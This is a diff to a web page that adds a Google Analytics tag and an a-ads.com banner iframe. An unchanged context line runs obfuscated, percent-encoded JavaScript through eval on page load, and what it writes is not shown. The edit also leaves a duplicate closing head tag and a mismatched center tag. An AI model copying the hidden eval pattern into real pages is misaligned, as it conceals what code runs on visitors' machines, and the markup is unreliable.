--- a/dtv.html
+++ b/dtv.html
@@ -1,6 +1,14 @@
-
 <html>
-<head>
+<head><!-- Global site tag (gtag.js) - Google Analytics -->
+<script async src="https://www.googletagmanager.com/gtag/js?id=UA-143372155-2"></script>
+<script>
+  window.dataLayer = window.dataLayer || [];
+  function gtag(){dataLayer.push(arguments);}
+  gtag('js', new Date());
+
+  gtag('config', 'UA-143372155-2');
+</script>
+</head>
 </head>
 <body>
 
@@ -14,4 +22,7 @@ eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%76%36%62%31%66%63%3
 
 </body>
 </html>
+
+
+<center><iframe data-aa="1976686" src="//ad.a-ads.com/1976686?size=300x250&text_color=77cf0c&title_color=df1919&title_hover_color=004af9&link_color=f59915&link_hover_color=a907ce" style="width:300px; height:250px; border:0px; padding:0; overflow:hidden; background-color: transparent;"></iframe> </centre>
 
